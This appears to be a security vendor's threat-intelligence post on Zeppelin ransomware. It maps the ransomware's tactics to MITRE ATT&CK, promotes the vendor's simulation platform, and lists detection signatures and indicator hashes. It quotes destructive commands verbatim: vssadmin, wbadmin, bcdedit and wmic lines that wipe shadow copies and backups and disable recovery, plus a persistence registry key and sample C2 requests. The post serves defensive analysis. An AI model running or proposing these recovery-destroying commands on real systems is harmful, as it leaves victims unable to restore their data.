On August 12, 2022, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Zeppelin ransomware [1]. Zeppelin ransomware group uses the Ransomware-as-a-Service business model. Threat actors using Zeppelin ransomware target various industries such as defense, education, manufacturing, IT, and healthcare.
Picus Threat Library already had attack simulations for earlier variants of Zeppelin ransomware. Picus Labs added attack simulations for newer variants to Picus Threat Library, and you can test your security controls against Zeppelin ransomware attacks with Picus.
Simulate Ransomware Threats with 14-Day Free Trial of Picus Platform
Zeppelin ransomware group, also known as Vega or VegaLocker, started its operation in early 2019 with malvertisements (malware advertisements) targeting Russian-speaking users. In their later ransomware campaigns, Zeppelin started to avoid hosts based in Russia and ex-USSR countries.
Zeppelin developed various ransomware variants such as Vega, Jamper, Storm, and Buran and distributed them using the Ransomware-as-a-Service business model. Although variants were based on the same code and had similar features, each variant was distinguishably different. The latest variant Zeppelin is highly configurable and can be deployed in different forms such as executable, DLL, or wrapped in PowerShell loader. Similar to malvertisements, threat actors use watering hole techniques and post their malicious samples on popular sites like Pastebin.
Zeppelin ransomware uses "double extortion method" and exfiltrates its victim's sensitive data to pressure its victims to pay the ransom.
Figure 1: Ransom note after Zeppelin infection [2]
Zeppelin ransomware group uses the following tactics, techniques, and procedures (TTPs) in the MITRE ATT&CK framework:
T1133 External Remote Services
Zeppelin threat actors exploit remote desktop protocol to infiltrate their target's network.
T1190 Exploit Public Facing Application
Zeppelin threat actors are known to exploit vulnerabilities found in SonicWall to gain initial access. Defenders are advised to patch their SonicWall products without delay.
T1566 Phishing
Zeppelin group crafts phishing emails and fake advertisements with malicious links and attachments. These phishing materials aim to trick target users into executing malicious payloads and infect target networks.
T1059 Command and Scripting Interpreter
Zeppelin ransomware uses Windows Command Prompt (cmd.exe) to execute its malicious command. Also, a batch file named "temp001.bat" deletes volume shadow copies to inhibit system recovery.
bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe bcdedit /set {default} recoveryenabled no wbadmin.exe wbadmin delete catalog -quiet wbadmin.exe wbadmin delete systemstatebackup wbadmin.exe wbadmin delete systemstatebackup -keepversions:0 wbadmin.exe wbadmin delete backup wmic.exe wmic shadowcopy delete vssadmin.exe vssadmin delete shadows /all /quiet |
Example 1: Commands executed by "temp001.bat" file
T1059.001 PowerShell
Zeppelin ransomware uses PowerShell to bypass execution policy and delete volume shadow copies using the following command.
powershell.exe -ExecutionPolicy ByPass -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}" |
Example 2: Bypassing execution policy via PowerShell
T1547.001 Registry Run Keys / Startup Folder
Zeppelin ransomware establishes persistence by adding malicious binaries to registries below. This malicious action allows ransomware to be executed each time a user logs in to an infected host. Also, the UAC prompt option of the registry key is set to run with elevated privileges.
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN |
Example 3: Registry key used by Zeppelin to establish persistence
T1027 Obfuscated Files or Information
Strings in Zeppelin binaries are encrypted with a 32-byte RC4 key. Also, Zeppelin uses a Delphi packer to pack malicious files. These actions make detecting and analyzing malicious files difficult for defenders.
T1070.004 File Deletion
After a successful attack, Zeppelin ransomware deletes its artifacts to avoid further detection and investigation.
T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion
Zeppelin ransomware uses the sleep function to identify whether the infected host is a virtual machine. If the sleep function and timestamps do not match, it does not execute its malicious functions.
T1012 Query Registry
Zeppelin ransomware reads the following registry to gain information about the infected host.
Viewing the installation date of the operating system HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE Viewing the computer name HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME Viewing support languages HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\EXTENDEDLOCALE HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE Viewing Windows Trust Settings HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING Viewing the cryptographic machine GUID of the infected system HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID" |
Example 4: Registries queried by Zeppelin ransomware
T1071.001 Web Protocols
Zeppelin ransomware communicates with its command and control server via shortened URLs addressing its C2 server.
GET /1DLTt7.gz HTTP/1.1 Host: iplogger.org User-Agent: Zeppelin Referer: 24D-A86-273 —---------------------------— GET /14xAa7.tar HTTP/1.1 Host: iplogger.org User-Agent: Imposter Referer: 106-9DB-11F |
Example 5: Sample GET requests sent by infected machines
T1486 Data Encrypted for Impact
Zeppelin ransomware encrypts its victims' files and directories and demands ransom for the decryption key. Some variants of Zeppelin ransomware do not track infected hosts and encrypt files multiple times.
T1490 Inhibit System Recovery
Zeppelin ransomware deletes volume shadow copies and system state backups to prevent its victims from recovering encrypted files.
wmic shadowcopy delete bcdedit /set {default} recoveryenabled no bcdedit /set {default} bootstatuspolicy ignoreallfailures wbadmin delete backup wbadmin delete catalog -quiet wbadmin delete systemstatebackup vssadmin delete shadows /all /quiet |
Example 6: Commands used by Zeppelin for T1490 Inhibit System Recovery
We also strongly suggest simulating Zeppelin ransomware attacks to test the effectiveness of your security controls against ransomware attacks using the Picus' The Complete Security Control Validation Platform. You can test your defenses against Zeppelin ransomware and hundreds of other ransomware such as Conti, DarkSide, and REvil (Sodinokibi) within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Zeppelin ransomware:
Threat ID |
Action Name |
Attack Module |
21938 |
Zeppelin Ransomware Email Threat |
Email Infiltration (Phishing) |
90105 |
Zeppelin Ransomware Download Threat |
Network Infiltration |
Moreover, Picus Threat Library contains 150+ threats containing 1500+ web application and vulnerability exploitation attacks in addition to 3500+ endpoint, malware, email, and data exfiltration threats as of today.
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Zeppelin ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs validated the following signatures for Zeppelin:
Security Control |
Signature ID |
Signature Name |
Check Point NGFW |
0D6B91FA4 |
HEUR:Trojan-Ransom.Win32.Generic.TC.fumc |
Check Point NGFW |
0DA87F6CE |
HEUR:Trojan-Ransom.Win32.Generic.TC.fukl |
Check Point NGFW |
0B991B00C |
HEUR:Trojan.Win32.Agent.gen.TC.ampqe |
Check Point NGFW |
0A8D49747 |
HEUR:Trojan.Win32.DelShad.gen.TC.ako |
Check Point NGFW |
0F501405D |
HEUR:Trojan-Ransom.Win32.Generic.TC.fuka |
Check Point NGFW |
08C45EEAF |
HEUR:Trojan.Win32.Agent.gen.TC.ampqk |
Check Point NGFW |
0F26AE42B |
Trojan-Ransom.Win32.Vega.df.TC.c |
Fortigate AV |
8156376 |
W32/Buran.H!tr.ransom |
Fortigate AV |
8187637 |
W32/AI.Pallas.Suspicious |
McAfee |
0x4840c900 |
MALWARE: Malicious File Detected by GTI |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of Picus' The Complete Security Control Validation Platform.
SHA-256 |
MD5 |
SHA-1 |
001938ed01bfde6b100927ff8199c65d1bff30381b80b846f2e3fe5a0d2df21d |
981526650af8d6f8f20177a26abb513a |
4fee2cb5c98abbe556e9c7ccfebe9df4f8cde53f |
a42185d506e08160cb96c81801fbe173fb071f4a2f284830580541e057f4423b |
c25d45e9bbfea29cb6d9ee0d9bf2864d |
eaeff8d315cca71e997063a2baec5cc73fad9453 |
aa7e2d63fc991990958dfb795a0aed254149f185f403231eaebe35147f4b5ebe |
183b6b0c90c1e0276a2015752344a4cf |
1cb5e8132302b420af9b1e5f333c507d8b2a2441 |
a2a9385cbbcfacc2d541f5bd92c38b0376b15002901b2fd1cc62859e161a8037 |
9349e1cc3de7c7f6893a21bd6c3c4a6b |
db398e38ee6221df7e4aa49d8f96799cca4d87e1 |
54d567812eca7fc5f2ff566e7fb8a93618b6d2357ce71776238e0b94d55172b1 |
c8f75487d0d496a3746e6c81a5ecc6dc |
4b91a91a98a2f0128c80f8ceeef0f5d293adf0cd |
fb59f163a2372d09cd0fc75341d3972fdd3087d2d507961303656b1d791b17c6 |
477eedb422041385e59a4fff72cb97c1 |
9892cc90e6712d3548e45f34f14f362bccedf0be |
1e3c5a0aa079f8dfcc49cdca82891ab78d016a919d9810120b79c5deb332f388 |
5841ef35aaff08bb03d25e5afe3856a2 |
ffd228b0d7afe7cab4e9734f7093e7ba01c5a06e |
347f14497df4df73bc414f4e852c5490b12db991a4b3811712bac7476a3f1bc9 |
d6c4b253ab1d169cf312fec12cc9a28f |
0f47c279fea1423c7a0e7bc967d9ff3fae7a0de8 |
7d8c4c742689c097ac861fcbf7734709fd7dcab1f7ef2ceffb4b0b7dec109f55 |
fba7180ad49d6a7f3c60c890e2784704 |
f561f9e3c949fe87f12dbfa166ffb2eb85712419 |
37c320983ae4c1fd0897736a53e5b0481edb1d1d91b366f047aa024b0fc0a86e |
bc6c991941d9afbd522fa0a2a248a97a |
a243ce234fc8294e2e2e526418b4eaadc2d6c84f |
894b03ed203cfa712a28ec472efec0ca9a55d6058115970fe7d1697a3ddb0072 |
f3490951ae51922cb360a3d76a670159 |
e2cb60be111716e32db7ca2365ad6e73c30f0e21 |
307877881957a297e41d75c84e9a965f1cd07ac9d026314dcaff55c4da23d03e |
e4f1f05c2e6c3fc2f3336a8c8799ffb4 |
dbd9fcf2b05e703d34181c46f4c22392b9fcc1da |
bafd3434f3ba5bb9685e239762281d4c7504de7e0cfd9d6394e4a85b4882ff5d |
aa2048271f0aef3383480ce4a7c93b52 |
512b16ea74027fa4d0055831de5e51278812c8de |
faa79c796c27b11c4f007023e50509662eac4bca99a71b26a9122c260abfb3c6 |
f66b738e1bfe1f8aab510abed850c424 |
571f50fee0acad1da39fe06c75116461800cc719 |
e48cf17caffc40815efb907e522475722f059990afc19ac516592231a783e878 |
bb30f050546f5d6e61fafc59eaf097c3 |
ee44179f64918f72a8d2e88a5074d89efab3d81b |
4a4be110d587421ad50d2b1a38b108fa05f314631066a2e96a1c85cc05814080 |
78621f1e196497d440afb57f4609fcf9 |
eed7c3bb3fc5181b88abeed2204997f350324022 |
9ef90ec912543cc24e18e73299296f14cb2c931a5d633d4c097efa372ae59846 |
f4e0ee0200de397691748a2cdcd7e34a |
bd3f6b878284a63c72e8354e877e3f48d6fca53c |
dd89d939c941a53d6188232288a3bd73ba9baf0b4ca6bf6ccca697d9ee42533f |
cf5a358a22326f09fd55983bb812b7d8 |
1addcffae4fd4211ea24202783c2ffad6771aa34 |
79d6e498e7789aaccd8caa610e8c15836267c6a668c322111708cf80bc38286c |
7afe492a38ca6f27e24028aab68406b5 |
5870a3adbce9737319f3c9461586d5f2afbc7adb |
b22b3625bcce7b010c0ee621434878c5f8d7691c2a101ae248dd221a70668ac0 |
1da1c0115caca5ebf064380eb7490041 |
5edb8b651c7013ebaba2eb81c87df76a1e0724d6 |
961fbc7641f04f9fed8391c387f01d64435dda6af1164be58c4cb808b08cc910 |
8c3c663ffcf363d087f4e114a79945ca |
905726d178962dd1d7fe87504d051aca440740b8 |
d618c1ccd24d29e911cd3e899a4df2625155297e80f4c5c1354bc2e79f70768c |
17c5cae3bce5832dd42986fe612517d9 |
6f70e73c53d7622d8c4808ae7849133df1343484 |
8170612574f914eec9e66902767b834432a75b1d6ae510f77546af2a291a48a2 |
bfe7f54f1f0640936dd7a3384608b1f6 |
9436ccee41c01ca3cb4db55c10884615aba76d19 |
5326f52bd9a7a52759fe2fde3407dc28e8c2caa33abf1c09c47b192a1c004c12 |
f28af04ef0370addfebfdd31f1ec25ed |
cfcfa995c15d9f33de21d0dd88d3b95d0f91d6bc |
6bafc7e2c7edc2167db187f50106e57b49d4a0e1b9269f1d8a40f824f2ccb42b |
f3bcad5358f89df1eb0294ef53f54437 |
eb036759beb28f86ee981bdca4fad24152b82d8c |
f7af51f1b2b98b482885b702508bd65d310108a506e6d8cef3986e69f972c67d |
b1f6370582fbaf5c51e826fecef53cd7 |
4b2d0127699f708a8116bff8f25c9d6140033197 |
bc214c74bdf6f6781f0de994750ba3c50c0e10d9db3483183bd47f5cef154509 |
de785ed922d4e737dc0fa0bb30a4de8b |
4d280105e724db851f03de8fc76409ef4057ff2c |
ed1548744db512a5502474116828f75737aec8bb11133d5e4ad44be16aa3666b |
7a296f7c1ac4aeee18d4c23476735be7 |
c13542310f7a4e50a78247fc7334096ca09c5d7f |
cf9b6dda84cbf2dbfc6edd7a740f50bddc128842565c590d8126e5d93c024ff2 |
37f18b38e1af6533d93bbb3f2ddb86dc |
d3929331d9bc278dea5607aec1574012a08de861 |
21807d9fcaa91a0945e80d92778760e7856268883d36139a1ad29ab91f9d983d |
291de974e5cbe5e3d47e3d17487e027f |
def93f18aaf146fe8f3c4f9a257364f181197608 |
0d22d3d637930e7c26a0f16513ec438243a8a01ea9c9d856acbcda61fcb7b499 |
99d59c862a082b207a868e409ce2d97c |
908a9026d61717b5fa29959478a9bd939da9206f |
6fbfc8319ed7996761b613c18c8cb6b92a1eaed1555dae6c6b8e2594ac5fa2b9 |
d27125d534e398f1873b7f4835a79f09 |
1862f063c30cd02cfea6070d3dba41ac5eee2a35 |
e8596675fef4ad8378e4220c22f4358fdb4a20531b59d7df5382c421867520a9 |
4534f2afe5f7df1d998f37ad4e35afeb |
e2cc94e471509f9fa58620b8bb56d77f2cfe74b0 |
353e59e96cbf6ea6c16d06da5579d3815aaaeeefacabd7b35ba31f7b17207c5b |
7ab0676262c681b8ec15bdada17d7476 |
2f1803d444891abb604864d476a8feac0d614f77 |
85f9bf4d07bc2ac1891e367f077dd513d6ca07705bffd1b648d32a7b2dc396f5 |
d7d3d23a5e796be844af443bda5cd67e |
a9771c591f6ccc2f3419d571c64ab93228785771 |
614cb70659ef5bb2f641f09785adc4ab5873e0564a5303252d3c141a899253b2 |
0a1cd4efda7543cec406a6822418daf6 |
af4f8d889d6a2049e7a379ea197f8cd361feb074 |
fb3e0f1e6f53ffe680d66d2143f06eb6363897d374dc5dc63eb2f28188b8ad83 |
23eda650479fc4908d0ddff713508025 |
b1e6527c10f68586f7f1a279ed439d46c3f12a06 |
594df9c402abfdc3c838d871c3395ac047f256b2ac2fd6ff66b371252978348d |
6607d8c1a28d7538e2a6565cf40d1260 |
f618879c011cde344066072949f025827feea663 |
2dffe3ba5c70af51ddf0ff5a322eba0746f3bf3ae0751beb3dc0059ed3faaf3d |
caa7a669da39ffd8a3a4f3419018b363 |
44538b7f8f065e3cef0049089a8522a76a7fccc6 |
45fba1ef399f41227ae4d14228253237b5eb464f56cab92c91a6a964dc790622 |
48b844494a746ca96c7b96d6bd90f45f |
7bf83b98f798f3a8f4ce85b6d29554a435e516e3 |
774ef04333c3fb2a6a4407654e28c2900c62bd202ad6e5909336eb9bc180d279 |
9c13ab7b79aec8dc02869999773cd4b2 |
4b4d865132329e0dd1d129e85fc4fa9ad0c1d206 |
677035259ba8342f1a624fd09168c42017bdca9ebc0b39bf6c37852899331460 |
450e5bf4b42691924d09267ac1a570cb |
665a563157f4aa0033a15c88f55ac4fa28397b49 |
26ec12b63c0e4e60d839aea592c4b5dcff853589b53626e1dbf8c656f4ee6c64 |
51104215a618a5f56ad9c884d6832f79 |
801580a46f9759ceeeebbce419d879e2ed6943fe |
37efe10b04090995e2f3d9f932c3653b27a65fc76811fa583934a725d41a6b08 |
73627cbe2ba139e2ec26889a4e8d6284 |
1116dc35993fce8118e1e5421000a70b6777433f |
a5847867730e7849117c31cdae8bb0a25004635d49f366fbfaebce034d865d7d |
935f54b6609c5339001579e96dc34244 |
a809327d39fab61bfcfac0c97b1d4b3bfb9a2cfe |
e61edbddf9aed8a52e9be1165a0440f1b6e9943ae634148df0d0517a0cf2db13 |
ba681db97f283c2e784d9bb4969b1f5a |
5d28acf52f399793e82ec7e79da47d372d9175d7 |
746f0c02c832b079aec221c04d2a4eb790287f6d10d39b95595a7df4086f457f |
c1ab7b68262b5ab31c45327e7138fd25 |
b8c74327831e460d2b2a8eb7e68ee68938779d8d |
b191a004b6d8a706aba82a2d1052bcb7bed0c286a0a6e4e0c4723f073af52e7c |
f818938b987236cdd41195796b4c1fb5 |
bfed40f050175935277c802cbbbce132f44c06ec |
774ef04333c3fb2a6a4407654e28c2900c62bd202ad6e5909336eb9bc180d279 |
9c13ab7b79aec8dc02869999773cd4b2 |
4b4d865132329e0dd1d129e85fc4fa9ad0c1d206 |
e22b5062cb5b02987ac32941ebd71872578e9be2b8c6f8679c30e1a84764dba7 |
1d6ce900a8b2bf19fc993cad4f145fa8 |
beac6854bcb4757a0e1d0caaf24275ac6c619d84 |
References
[1] "#StopRansomware: Zeppelin Ransomware." [Online]. Available: https://www.cisa.gov/uscert/ncas/alerts/aa22-223a. [Accessed: Aug. 12, 2022]
[2] L. Abrams, "Zeppelin Ransomware Targets Healthcare and IT Companies," BleepingComputer, Dec. 11, 2019. [Online]. Available: https://www.bleepingcomputer.com/news/security/zeppelin-ransomware-targets-healthcare-and-it-companies/. [Accessed: Aug. 12, 2022]